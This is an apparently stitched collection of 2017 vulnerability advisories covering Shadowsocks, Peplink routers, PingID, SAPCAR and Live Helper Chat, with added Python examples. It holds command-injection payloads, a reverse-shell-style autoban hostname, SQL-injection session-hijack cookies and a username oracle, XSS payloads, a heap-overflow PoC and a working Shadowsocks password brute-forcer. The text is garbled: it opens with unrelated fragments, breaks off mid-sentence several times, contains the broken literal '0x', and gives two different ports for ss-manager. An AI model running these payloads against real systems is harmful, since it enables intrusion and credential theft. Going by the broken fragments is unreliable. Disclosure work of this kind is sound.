=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

References:

1. https://www.bomgar.com/

2. https://www.bomgar.com/support/changelog/remote-support-15-2-3

3. https://www.bomgar.com/support/changelog/remote-support-16-1-5

4. https://www.bomgar.com/support/changelog/remote-support-1624


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

This advisory is distributed for educational purposes only with the sincere
hope that it will help promote public safety.  This advisory comes with
absolutely NO WARRANTY; not even the implied warranty of merchantability or
fitness for a particular purpose.  Neither Virtual Security Research, LLC nor
the author accepts any liability for any direct, indirect, or consequential
loss or dama

Advisory X41-2017-010: Command Execution in Shadowsocks-libev

2017-10-16 Thread X41 D-Sec GmbH Advisories

X41 D-Sec GmbH Security Advisory: X41-2017-010

Command Execution in Shadowsocks-libev
==

Overview

Severity Rating: High
Confirmed Affected Versions: 3.1.0
Confirmed Patched Versions: N/A
Vendor: Shadowsocks
Vendor URL: https://github.com/shadowsocks/shadowsocks-libev
Vector: Local
Credit: X41 D-Sec GmbH, Niklas Abel
Status: Public
CVE: not yet assigned
Advisory-URL:
https://www.x41-dsec.de/lab/advisories/x41-2017-010-shadowsocks-libev/


Summary and Impact
--
Shadowsocks-libev allows local command execution via the configuration file
and, additionally, via UDP requests to 127.0.0.1.

The configuration file on the file system or the JSON configuration
received via UDP request is parsed and the arguments are passed to the
"add_server" function.
The function calls "construct_command_line(manager, server);" which
returns a string from the parsed configuration.
The string gets executed at line 486 "if (system(cmd) == -1) {", so if a
configuration parameter contains "||evil command&&" within the "method"
parameter, the evil command will get executed.

The ss-manager uses UDP port 8830 to get control commands on 127.0.0.1.
By default no authentication is required, although a password can be set
with the '-k' parameter.


Product Description
---
Shadowsocks-libev is a lightweight secured SOCKS5 proxy for embedded
devices and low-end boxes. The ss-manager is meant to control
Shadowsocks servers for multiple users, it spawns new servers if needed.

It is a port of Shadowsocks created by @clowwindy, and maintained by
@madeye and @linusyang.


Proof of Concept

Because the passed configuration requests are executed through the shell, the
following command will create the file "evil" in /tmp/ on the server:

nc -u 127.0.0.1 8839
add: {"server_port":8003, "password":"test", "method":"||touch
/tmp/evil||"}

The code is executed through shadowsocks-libev/src/manager.c.
If the configuration file on the file system is manipulated, the code
would get executed as soon as a Shadowsocks instance is started from
ss-manager, as long as the malicious part of the configuration has not
been overwritten.


Workarounds
---
There is no workaround available; do not use ss-manager until a patch is
released.


About X41 D-Sec GmbH

X41 D-Sec is a provider of application security services. We focus on
application code reviews, design review and security testing. X41 D-Sec
GmbH was founded in 2015 by Markus Vervier. We support customers in
various industries such as finance, software development and public
institutions.

Timeline

2017-09-28  Issues found
2017-10-05  Vendor contacted
2017-10-09  Vendor contacted, replied to use GitHub for a full disclosure
2017-10-11  Vendor contacted, asked if the vendor is sure to want a full
disclosure
2017-10-12  Vendor contacted, replied to create a public issue on GitHub
2017-10-13  Created public issue on GitHub
2017-10-13  Advisory release







Advisory X41-2017-008: Multiple Vulnerabilities in Shadowsocks

2017-10-16 Thread X41 D-Sec GmbH Advisories

X41 D-Sec GmbH Security Advisory: X41-2017-008

Multiple Vulnerabilities in Shadowsocks
===

Overview

Confirmed Affected Versions: Latest commit 2ab8c6b on Sep 6
Confirmed Patched Versions: N/A
Vendor: Shadowsocks
Vendor URL: https://github.com/shadowsocks/shadowsocks/tree/master
Vector: Network
Credit: X41 D-Sec GmbH, Niklas Abel
Status: Public
Advisory-URL:
https://www.x41-dsec.de/lab/advisories/x41-2017-008-shadowsocks/


Summary and Impact
--
Several issues have been identified, which allow attackers to manipulate
log files, execute commands, and brute force Shadowsocks even when the
autoban.py brute force detection is enabled. The brute force detection from
autoban.py does not work with the suggested tail command. The key of captured
Shadowsocks traffic can be brute forced.


Product Description
---
Shadowsocks is a fast tunnel proxy that helps you bypass firewalls.



Log file manipulation
=
Severity Rating: Medium
Confirmed Affected Versions: Latest commit 2ab8c6b on Sep 6
Confirmed Patched Versions: N/A
Vector: Network
CVE: not yet issued
CWE: 117
CVSS Score: 4.3
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Summary and Impact
--
Log file manipulation is possible with a crafted hostname sent to the
server by a client, even if Shadowsocks is running as quietly as
possible with "-qq".

For example, a string like "\nI could be any log entry\n" can be sent as
the hostname to Shadowsocks. The server then logs an additional line
reading "I could be any log entry".


Workarounds
---
There is no workaround available, do not trust the logfiles until a
patch is released.



Command Execution
=
Severity Rating: Critical
Confirmed Affected Versions: Latest commit 2ab8c6b on Sep 6
Confirmed Patched Versions: N/A
Vector: Network
CVE: not yet issued
CWE: 78
CVSS Score: 9.0
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H


Summary and Impact
--
When the brute force detection with autoban.py is enabled, remote
attackers are able to execute arbitrary commands.

Command execution is possible because of line 53, "os.system(cmd)", in
autoban.py, which executes "cmd = 'iptables -A INPUT -s %s -j DROP' %
ip". The "ip" parameter is parsed from the log file, whose contents
can be controlled by a third party sending unauthenticated packets.


Proof of Concept

When a string like "can not parse header when ||ls&:\n" is sent as the
host name to Shadowsocks, it ends up in the logfile and leads to the
execution of "ls".
autoban.py does not execute commands with spaces due to internal
sanitization. A requested hostname like:

" can not parse header when ||ls&:\ntouch /etc/evil.txt\nexit\ncan not
parse header when ||/bin/bash

https://github.com/shadowsocks/shadowsocks/wiki/Ban-Brute-Force-Crackers

The command "python autoban.py < /var/log/shadowsocks.log" does work,
but the suggested "nohup tail -F /var/log/shadowsocks.log | python
autoban.py > log 2>log &" does not block IPs.
The "for line in sys.stdin:" loop in autoban.py reads its input until it
reaches end of file (EOF). As "tail -F" never closes the pipe, no EOF
arrives and the loop blocks waiting for input (under Python 2, iterating
over sys.stdin additionally uses a read-ahead buffer, so lines are only
handed to the loop once several kilobytes have accumulated). So the
"tail -F /var/log/shadowsocks.log | autoban.py" pipeline never blocks
anything except itself.

Workarounds
---
Run "python autoban.py < /var/log/shadowsocks.log" from a cron job instead
of the tail pipeline. Do not use autoban.py at all until the command
execution issue is fixed.
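The two autoban.py issues above, log injection through the hostname field and the injected text reaching os.system(), shown side by side with a hardened version. This is an added example, not code from the Shadowsocks project or from the X41 advisory: the log line format and the exact field extraction in autoban.py are assumptions modelled on the advisory's description, and the IP addresses are constructed.

```python
import ipaddress
import subprocess

# Hostname as a client would send it, taken from the advisory's proof of
# concept. The trailing newline starts a fresh log line.
INJECTED_HOSTNAME = "can not parse header when ||ls&:\n"


def log_line_vulnerable(hostname: str) -> str:
    """Log entry built the way the advisory describes: the client-supplied
    hostname is written into the log verbatim, control characters included.
    (The 'INFO connecting' prefix is a constructed stand-in for the real format.)"""
    return "INFO connecting %s\n" % hostname


def sanitize_for_log(value: str) -> str:
    """Escape anything that is not printable so one field can never become
    a second log line: newline -> '\\n', CR -> '\\r', NUL -> '\\x00'."""
    return "".join(ch if ch.isprintable() else repr(ch)[1:-1] for ch in value)


def log_line_safe(hostname: str) -> str:
    return "INFO connecting %s\n" % sanitize_for_log(hostname)


def extract_ip_autoban_style(line: str) -> str:
    """Field extraction modelled on what the advisory attributes to autoban.py
    (assumption about its exact code): last whitespace-separated token of the
    line, cut at the first colon. A genuine '... 198.51.100.7:54321' line
    yields the IP; the injected line yields '||ls&'."""
    return line.split()[-1].split(":")[0]


def ban_command_vulnerable(ip: str) -> str:
    """The string autoban.py hands to os.system(), per the advisory. With
    ip == '||ls&' the shell runs 'ls' in the background."""
    return "iptables -A INPUT -s %s -j DROP" % ip


def ban_command_safe(ip: str):
    """Hardened replacement: refuse anything that is not a literal IP
    address and build an argv list so no shell ever parses it."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return None
    tool = "iptables" if addr.version == 4 else "ip6tables"
    return [tool, "-A", "INPUT", "-s", str(addr), "-j", "DROP"]


def ban(ip: str, execute: bool = False) -> bool:
    """Returns True if the address was accepted. Execution is off by default
    so the example runs without root or iptables installed."""
    argv = ban_command_safe(ip)
    if argv is None:
        return False
    if execute:
        subprocess.run(argv, check=True)
    return True


def process_log(text: str):
    """Run both parsers over a log. Returns (strings the vulnerable path would
    pass to the shell, addresses the safe path would actually block)."""
    shelled, blocked = [], []
    for line in text.splitlines():
        if "can not parse header when" not in line:
            continue
        ip = extract_ip_autoban_style(line)
        shelled.append(ban_command_vulnerable(ip))
        argv = ban_command_safe(ip)
        if argv is not None:
            blocked.append(argv[4])
    return shelled, blocked


if __name__ == "__main__":
    # Constructed log: one genuine warning (made-up client IP) plus the
    # line the injected hostname produces.
    log = ("WARNING can not parse header when handling connection from 198.51.100.7:54321\n"
           + log_line_vulnerable(INJECTED_HOSTNAME))
    print(process_log(log))
```

The fix has two independent halves: the logger refuses to let a field span lines, and the consumer refuses to act on anything that is not an IP address and never goes through a shell. Either half alone would have stopped this particular payload; both are needed because log files are routinely consumed by tools the logging code knows nothing about.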



Bruteforcable Shadowsocks traffic because of MD5

Confirmed Affected Versions: Latest commit 2ab8c6b on Sep 6
Confirmed Patched Versions: N/A

Summary and Impact
--
Shadowsocks uses no brute force prevention for its key derivation function.

The key for Shadowsocks traffic encryption is static and derived from
the password using MD5. The password derivation is in encrypt.py,
lines 56 to 63:

    import hashlib

    m = []
    i = 0
    while len(b''.join(m)) < (key_len + iv_len):
        md5 = hashlib.md5()
        data = password
        if i > 0:
            data = m[i - 1] + password
        md5.update(data)
        m.append(md5.digest())
        i += 1

MD5 is a fast general-purpose hash function, not a password-based key
derivation function, and should not be used to turn a password into a key.
A proper password-based key derivation function makes the derivation
deliberately expensive: a small one-off cost for the legitimate user, but
a large one for an attacker, who has to repeat it for every guess. As
passwords usually have low entropy, a good password derivation function
has to be slow.


Workarounds
---
Use a password generated by a cryptographically secure random generator,
long enough that a dictionary attack is infeasible. Wait for a patch that
uses a password-based key derivation function such as Argon2 instead of
a plain hash.
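An added example, not code from Shadowsocks or from the advisory, showing why the derivation quoted above is brute-forceable. It reproduces the chained-MD5 derivation, the "rc4-md5" method (session key = MD5(key || IV), IV sent in clear ahead of the ciphertext) and the Shadowsocks request header, then runs a dictionary attack against a single captured first packet, using the header's structure as the correctness oracle. The password, wordlist, IV and destination are constructed. A PBKDF2 derivation from the standard library is included for contrast only: a salted KDF needs both ends to agree on a salt, which the protocol of that time does not carry, so the real fix is the protocol change the workaround anticipates.

```python
import hashlib

KEY_LEN = IV_LEN = 16  # "rc4-md5" method: 16-byte key, 16-byte IV


def evp_bytes_to_key(password: bytes, key_len: int, iv_len: int):
    """The derivation quoted from encrypt.py: chained MD5 blocks, no salt, no
    iteration count. Shadowsocks keeps only the key part and sends a random
    IV per connection instead of the derived one."""
    m = []
    i = 0
    while len(b"".join(m)) < key_len + iv_len:
        data = password if i == 0 else m[i - 1] + password
        m.append(hashlib.md5(data).digest())
        i += 1
    ms = b"".join(m)
    return ms[:key_len], ms[key_len:key_len + iv_len]


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Used here because it is the simplest stream
    cipher Shadowsocks offered and needs no third-party library."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def rc4_md5_encrypt(password: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """rc4-md5 as Shadowsocks defines it: session key = MD5(key || iv), IV in clear."""
    key, _ = evp_bytes_to_key(password, KEY_LEN, IV_LEN)
    return iv + rc4(hashlib.md5(key + iv).digest(), plaintext)


def request_header(hostname: bytes, port: int) -> bytes:
    """Shadowsocks request header for a domain name: ATYP 0x03, length byte,
    name, 2-byte big-endian port."""
    return b"\x03" + bytes([len(hostname)]) + hostname + port.to_bytes(2, "big")


HOST_CHARS = frozenset(b"abcdefghijklmnopqrstuvwxyz0123456789.-")


def looks_like_domain_header(pt: bytes) -> bool:
    """Plausibility oracle: a correct guess decrypts to a well-formed
    domain-type header, a wrong one to noise. Only ATYP 3 is accepted so the
    false-positive rate stays negligible (a real tool would add IPv4/IPv6)."""
    if len(pt) < 4 or pt[0] != 3:
        return False
    n = pt[1]
    if n == 0 or len(pt) < 2 + n + 2:
        return False
    name, port = pt[2:2 + n], int.from_bytes(pt[2 + n:4 + n], "big")
    return all(c in HOST_CHARS for c in name) and port != 0


def recover_password(captured: bytes, wordlist):
    """Offline dictionary attack on one captured first packet. Cost per guess:
    two MD5 calls for the key plus one for the session key. There is no salt,
    so the key part can even be precomputed once and reused across targets."""
    iv, body = captured[:IV_LEN], captured[IV_LEN:]
    for guess in wordlist:
        key, _ = evp_bytes_to_key(guess, KEY_LEN, IV_LEN)
        if looks_like_domain_header(rc4(hashlib.md5(key + iv).digest(), body)):
            return guess
    return None


def derive_with_pbkdf2(password: bytes, salt: bytes, iterations: int = 600_000) -> bytes:
    """What the workaround asks for, using the standard library (Argon2 would
    need a third-party package): every guess now costs `iterations` HMAC
    computations instead of two MD5 calls."""
    return hashlib.pbkdf2_hmac("sha256", password, salt, iterations, dklen=KEY_LEN)


# Constructed sample: a client with password "letmein" opening example.com:443.
# The IV is fixed only to keep the example reproducible; real clients draw it at random.
SAMPLE_IV = bytes(range(16))
CAPTURED = rc4_md5_encrypt(b"letmein", SAMPLE_IV,
                           request_header(b"example.com", 443) + b"GET / HTTP/1.1\r\n")
WORDLIST = [b"123456", b"password", b"shadowsocks", b"letmein", b"qwerty"]

if __name__ == "__main__":
    print(recover_password(CAPTURED, WORDLIST))
```

The oracle is the point: because the stream ciphers carry no authentication tag, the attacker needs no knowledge of the payload, only of the header layout every Shadowsocks connection starts with, and the three MD5 calls per candidate are cheap enough to run a large wordlist against a single sniffed packet.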



About X41 D-S

X41-2017-005 - Multiple Vulnerabilities in peplink balance routers

2017-06-05 Thread X41 D-Sec GmbH Advisories

X41 D-Sec GmbH Security Advisory: X41-2017-005

Multiple Vulnerabilities in peplink balance routers
===

Overview

Confirmed Affected Versions: 7.0.0-build1904
Confirmed Patched Versions:
fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093.bin
Vulnerable Firmware:
fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.0-build1904.bin
Models: Balance Routers 305, 380, 580, 710, 1350, 2500
Vendor: Peplink
Vendor URL: https://www.peplink.com/
Vector: Network
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Additional Credits: Claus Overbeck (Abovo IT)
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-005-peplink/


Summary and Impact
--
Several issues have been identified, which allow attackers to access the
administrative web interface with admin credentials, delete files,
perform CSRF and XSS attacks.


Product Description
---
From the vendor webpage:
Use Load Balancing and SpeedFusion bandwidth bonding to deliver
superfast VoIP, video streaming, and data using an SD-WAN enabled
network. Even with a basic Balance 20 dual-WAN router, you can mix
different transport technologies and providers to keep your network up
when individual links go down. Switching between links is automatic and
seamless.



SQL Injection via bauth Cookie
==
Severity Rating: Critical
Vector: Network
CVE: CVE-2017-8835
CWE: 89
CVSS Score: 9.8
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary and Impact
--
Peplink devices are vulnerable to an SQL injection attack via the bauth
cookie parameter which is set e.g. when accessing
https://ip/cgi-bin/MANGA/admin.cgi.

The injection can be checked with the following command:

./sqlmap.py -u "https://ip/cgi-bin/MANGA/admin.cgi" \
  --cookie="bauth=csOWLxU4BvoMfhY2rHLVFm1EmZWV74zinla9IVclqrYxH16426647" \
  -p "bauth" --level 5 --risk 3 --dbms sqlite --technique=BEUSQ \
  --flush-session -t trace.log --prefix "'" --suffix "--" -a

The vulnerability in the Peplink device allows access to the SQLite
session database containing user and session variables. By using the
following cookie in a web request, it is possible to select a running
administrator session to be used for the attacker's login.

bauth=-12' or id IN (select s.id from sessions as s left join
sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1')
or '1'='2

By forming specialised SQL queries, it is possible to retrieve usernames
from the database. This works as a boolean oracle: the query returns a
valid session if a username matching the condition exists and no session
if it does not. In the first case the server does not set a new session
cookie in the response to the request.

SELECT id FROM sessions WHERE sessionid = '-14' or id IN (select s.id
from sessions as s left join sessionsvariables as v on v.id=s.id where
v.name='username' and substr(v.value,1,3)='adm')



Workarounds
---
Install vendor supplied update.
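A runnable model of the injection and of the two oracles described above, as an added example; this is neither Peplink's code nor the advisory's. The session tables are reconstructed from the column names the payloads reference (sessions.id, sessions.sessionid, sessionsvariables.id/name/value), the rows are constructed, and the string-concatenated lookup is an assumption about how admin.cgi builds its query. The safe variant binds the cookie as a parameter.

```python
import sqlite3


def build_session_db() -> sqlite3.Connection:
    """Constructed schema and rows; only the table and column names come from
    the advisory's payloads. 'rwa' = '1' marks the administrative session."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE sessions (id INTEGER PRIMARY KEY, sessionid TEXT NOT NULL UNIQUE);
        CREATE TABLE sessionsvariables (id INTEGER NOT NULL, name TEXT NOT NULL, value TEXT NOT NULL);
        INSERT INTO sessions VALUES (7, 'sess-admin-constructed');
        INSERT INTO sessionsvariables VALUES (7, 'username', 'admin'), (7, 'rwa', '1');
        INSERT INTO sessions VALUES (8, 'sess-viewer-constructed');
        INSERT INTO sessionsvariables VALUES (8, 'username', 'viewer'), (8, 'rwa', '0');
    """)
    return con


def session_id_vulnerable(con, bauth: str):
    """Lookup shaped like the one the payloads imply: the cookie value is
    pasted into the query text (assumption about the CGI's code)."""
    sql = "SELECT id FROM sessions WHERE sessionid = '%s'" % bauth
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def session_id_safe(con, bauth: str):
    """Same lookup with a bound parameter: the cookie is only ever compared
    as a string and never parsed as SQL."""
    row = con.execute("SELECT id FROM sessions WHERE sessionid = ?", (bauth,)).fetchone()
    return row[0] if row else None


# Session-hijack cookie from the advisory: select any live session whose
# 'rwa' variable is '1' instead of the one matching the (bogus) session id.
HIJACK_COOKIE = ("-12' or id IN (select s.id from sessions as s left join "
                 "sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1') or '1'='2")


def username_prefix_exists(con, prefix: str) -> bool:
    """Boolean oracle built from the advisory's substr() query: a session is
    returned (and no fresh cookie would be set) iff some username starts with
    prefix. The prefix is attacker-chosen, so it is restricted to [a-z0-9] below."""
    cookie = ("-14' or id IN (select s.id from sessions as s left join sessionsvariables as v "
              "on v.id=s.id where v.name='username' and substr(v.value,1,%d)='%s') or '1'='2"
              % (len(prefix), prefix))
    return session_id_vulnerable(con, cookie) is not None


def recover_username(con, alphabet="abcdefghijklmnopqrstuvwxyz0123456789", max_len=32) -> str:
    """Extend the prefix one character at a time until no character matches.
    Greedy: with several users it follows the first branch the alphabet hits."""
    found = ""
    while len(found) < max_len:
        for ch in alphabet:
            if username_prefix_exists(con, found + ch):
                found += ch
                break
        else:
            return found
    return found


if __name__ == "__main__":
    db = build_session_db()
    print("hijacked session:", session_id_vulnerable(db, HIJACK_COOKIE))
    print("same cookie, bound parameter:", session_id_safe(db, HIJACK_COOKIE))
    print("recovered username:", recover_username(db))
```

The enumeration costs one request per alphabet character per position, and the only signal it needs is whether the response sets a new cookie, which is exactly the side channel the advisory describes.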


No CSRF Protection
==
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8836
CWE: 352
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Summary and Impact
--
The CGI scripts in the administrative interface are not protected
against cross-site request forgery attacks. This allows an attacker to
execute commands if a logged-in user visits a malicious website. This
can, for example, be used to change the credentials of the administrative
web interface.


Workarounds
---
Install vendor supplied update.




Passwords stored in Cleartext
=
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8837
CWE: 256
CVSS Score: 4.0
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Summary and Impact
--
The Peplink devices store passwords in cleartext in the files
/etc/waipass and /etc/roapass. In case one of these devices is
compromised the attacker can gain access to the cleartext passwords and
abuse them to compromise further systems.


Workarounds
---
Install vendor supplied update.




XSS via syncid Parameter

Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8838
CWE: 80
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Summary and Impact
--
If the web interface is accessible, it is possible to abuse the syncid
parameter to trigger a cross-site scripting issue by calling
https://ip/cgi-bin/HASync/hasync.cgi?debug=1&syncid=123%3Cscript%3Ealert%281%29%3C/script%3E

This executes the JavaScript in the victim's browser, which can be abused
to steal session cookies.

Workarounds
---
Install vendor supplied update.




XSS via preview.cgi
===
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8839
CWE: 80
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Summary and Impact
--
If the webint

PingID (MFA) - Reflected Cross-Site Scripting

2017-05-17 Thread Advisories
#
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#
#
# Product:  PingID (MFA) [1]
# Vendor:   Ping Identity Corporation
# CSNC ID:  CSNC-2017-013
# Subject:   Reflected Cross-Site Scripting
# Risk:High
# Effect: Remotely exploitable
# Author:   Stephan Sekula <stephan.sek...@compass-security.com>
# Date:  18.04.2017
#
#

Introduction:
-
With PingID MFA, you can easily control when your users need to authenticate
with a second factor. You can configure your policies based upon the following:
Group - Require MFA for members of a specific group.
Application - Require MFA for specific applications.
Geofence - Require MFA if the user is outside a pre-set geofence.
Rooted or Jailbroken device - Require MFA if the user's device is rooted or
jailbroken.
Network IP - Require MFA if the device isn't in a specific IP range.
PingID MFA delivers the granular security that your policies require with the
ease of use your users want. [1]

Compass Security discovered a web application security flaw in PingID's
authentication process, which allows an attacker to manipulate the resulting
website. This allows, for instance, attacking the user's browser or redirecting
the user to a phishing website.


Technical Description
-
During the authentication process, a message parameter is used, which can
be manipulated. If this parameter contains JavaScript code, it is executed
in the user's browser. Exploiting the vulnerability will lead to so-called
Cross-Site Scripting (XSS), allowing the execution of JavaScript in the
context of the victim.

Request:
POST /pingid/ppm/auth/otp HTTP/1.1
Host: authenticator.pingone.com
[CUT]
Referer: https://authenticator.pingone.com/pingid/ppm/auth/otp
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

otp=123456&message=<script>alert(0)</script>

Response:
HTTP/1.1 200 OK
Date: Thu, 13 Apr 2017 11:21:45 GMT
Server:
Cache-Control: no-cache, no-store
[CUT]
Connection: close
X-Content-Type-Options: nosniff
Content-Length: 8313




[CUT]


[CUT]
<script>alert(0)</script>
[CUT]




Workaround / Fix:
-
The vendor has addressed the vulnerability. In general, this issue can be fixed
by properly encoding all output that is posted back to the user, for instance
using HTML encoding to convert < to &lt; and > to &gt;.


Timeline:
-
2017-05-16: Coordinated public disclosure date
2017-05-03: Release of fixed version/patch
2017-04-20: Initial vendor response
2017-04-19: Initial vendor notification
2017-04-13: Discovery by Stephan Sekula


References:
---
[1] https://www.pingidentity.com/en/products/pingid.html



[CORE-2017-0001] - SAP SAPCAR Heap Based Buffer Overflow Vulnerability

2017-05-11 Thread Core Security Advisories Team
1. *Advisory Information*

Title: SAP SAPCAR Heap Based Buffer Overflow Vulnerability
Advisory ID: CORE-2017-0001
Advisory URL: http://www.coresecurity.com/advisories/sap-sapcar-
heap-based-buffer-overflow-vulnerability
Date published: 2017-05-10
Date of last update: 2017-05-10
Vendors contacted: SAP
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Heap-based Buffer Overflow [CWE-122]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2017-8852

3. *Vulnerability Description*

SAP [1] distributes software and packages using an archive program
called SAPCAR [2].
This program uses a custom archive file format. A memory corruption
vulnerability was found in the parsing of specially crafted archive
files that could lead to local code execution scenarios.

4. *Vulnerable Packages*

SAPCAR archive tool version 721.510
Other products and versions might be affected, but they were not tested.

5. *Vendor Information, Solutions and Workarounds*

SAP published the following Security Notes:
   . 2441560

6. *Credits*

This vulnerability was discovered and researched by Martin Gallo and
Maximiliano Vidal from Core Security Consulting Services. The
publication of this advisory was coordinated by Alberto Solino from
Core Advisories Team.

7. *Technical Description / Proof of Concept Code*

This vulnerability is caused by a controlled heap buffer overflow when
opening a specially crafted CAR archive file.

The following python code can be used to generate an archive file that
triggers the vulnerability:

/-
#!/usr/bin/env python

from scapy.packet import Raw
from pysap.SAPCAR import *

# We write a file just to have some data to put into the archive
with open("string.txt", "w") as fd:
    fd.write("Some string to compress")

# Create a new SAP CAR Archive
f = SAPCARArchive("poc.car", mode="wb", version=SAPCAR_VERSION_200)
# Add the text file
f.add_file("string.txt")

# Replace the blocks in the compressed file with the faulty blocks
f._sapcar.files0[0].blocks.append(Raw("D>" + "\x00"*30 + "\x00\xff"))
f._sapcar.files0[0].blocks.append(Raw("A" * 0x))

# Write the file
f.write()

$ ./SAPCAR -tvf poc.car
SAPCAR: processing archive poc.car (version 2.00)
-rw-rw-r--  2309 Feb 2017 18:12 string.txt
Segmentation fault (core dumped)
-/


The CAR archive files in its version 2.00 are comprised of an archive
header and a list of archived files [3]. Each archived file has a
header containing the file's metadata, and the content of the file is
split among several blocks.
When the SAPCAR program opens a file containing an archived file block
different than the known ones [4], it reads an additional 32 bytes of
file metadata. The program then uses the last two bytes of the data
read as a size field, and copies that amount of data into a fixed-
length buffer previously allocated in the heap. As the length field is
not properly validated, the operation results in a heap-based buffer
overflow.

It's worth mentioning that signature validation doesn't prevent the
vulnerability from being triggered, as the signature file needs to be
extracted from the archive file before the validation can be
performed.

8. *Report Timeline*

2017-02-15: Core Security sent an initial notification to SAP.
2017-02-16: SAP confirmed the reception of the email and requested the
draft version of the advisory.
2017-02-16: Core Security sent SAP a draft version of the advisory and
informed them we would adjust our publication schedule according with
the release of a solution to the issues.
2017-02-17: SAP confirmed reception of the draft advisory and assigned
the incident ticket 1780137949 for tracking this issue. They will
answer back once the team analyze the report.
2017-03-06: Core Security asked SAP for news about the advisory and
publication date.
2017-03-08: SAP answered back saying they had troubles generating the
SAPCAR archive. They asked for a pre-built one.
2017-03-08: Core Security researcher sent a PoC SAPCAR archive that can
trigger the vulnerability. SAP confirmed reception.
2017-03-08: SAP asked for GPG key for one of the researchers involved
in the discovery. Core Security sent (again) the key. SAP confirmed
reception.
2017-03-13: SAP confirmed they could reproduce the vulnerability. They
said they cannot commit to a publication date yet, but they aim at May
9th, although it could fall in April Patch day or postpone after May.
2017-03-13: Core Security thanked SAP for the tentative date and
informed them we would publish our security advisory accordingly upon
their confirmation.
2017-04-03: Core Security asked SAP for an update about the final
publication date for this vulnerability's patch.
2017-04-05: SAP confirmed they will be able to release the fix in May,
although there could be chances to release it in April. They will
confirm as soon as poss

Live Helper Chat - Cross-Site Scripting

2017-04-28 Thread Advisories
#
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/en/research/advisories/
#
#
# CSNC ID: CSNC-2017-004
# Product: Live Helper Chat [1]
# Vendor:  Live Helper Chat
# Subject: Cross-Site Scripting - XSS
# Risk:High
# Effect:  Remotely exploitable
# Author:  Sylvain Heiniger (sylvain.heini...@compass-security.com)
# Date:April 24, 2017
#
#


Introduction:

Live Helper Chat is a live chat support for websites. It provides a simple
solution for companies to get in contact with visitors of their websites. [1]

Compass Security discovered a web application security flaw in the Live
Helper Chat application which allows an attacker to execute JavaScript code in
the browser of a user. This allows, for instance, attacking the user's browser
or redirecting the user to a phishing website. The attack will be in some cases
automatically run in the backend operator's session. Otherwise, one can send
the victim a link to the website with the malicious payload.


Affected Versions:
---
The following Live Helper Chat versions are vulnerable:
- 2.06v - 2.58v [2]


Patches:
---
Live Helper Chat released a patch as part of release 2.60v [3, 4].


Technical Description:
-
Live Helper Chat detects the visitor's IP address. To this end, it reads the
"X-Forwarded-For" HTTP header. Any visitor can inject a <script> tag in this
header. It will be reflected in the administrator's "online users" information
page as well as in the "print chat" page.

User's request:
===
POST /lhc_web/index.php/chat/chatwidget/(vid)/47428qicplsqmfe9huq2/(leaveamessage)/true HTTP/1.1
Host: localhost
X-Forwarded-For: <script>alert(1);
Connection: close
Content-Length: 188

Username=Example=My+question_timezone=2=%2F%2Flocalhost%2F==0=1_1977271e431742414c31477d258028664d713ae0=1475518554=1475518554
===

A subsequent request to the online users page
/lhc_web/index.php/site_admin/chat/onlineusers/(method)/ajax/(timeout)/3600/(maxrows)/50
will be answered with:
===
[{"id":"1","ip":"
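An added example, not code from Live Helper Chat or from Compass Security, showing the two things the X-Forwarded-For issue above calls for: deciding which hop of the header, if any, may be believed, and encoding whatever is rendered, which is also the general fix the PingID advisory on this page points to. The trusted proxy address and the client addresses are constructed; the payload is the one from the advisory's request.

```python
import html
import ipaddress

# Assumption for the example: the site sits behind one reverse proxy at this
# address, so only X-Forwarded-For entries it appended can be trusted.
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}

# Header value from the advisory's request.
XFF_PAYLOAD = "<script>alert(1);</script>"


def visitor_ip_vulnerable(xff_header):
    """What the advisory describes: the raw header text is taken as the
    visitor's IP and later echoed into the operator's pages unescaped."""
    return xff_header


def client_ip(remote_addr: str, xff_header):
    """Resolve the client address without trusting header text.
    - If the TCP peer is not one of our proxies, the header is whatever the
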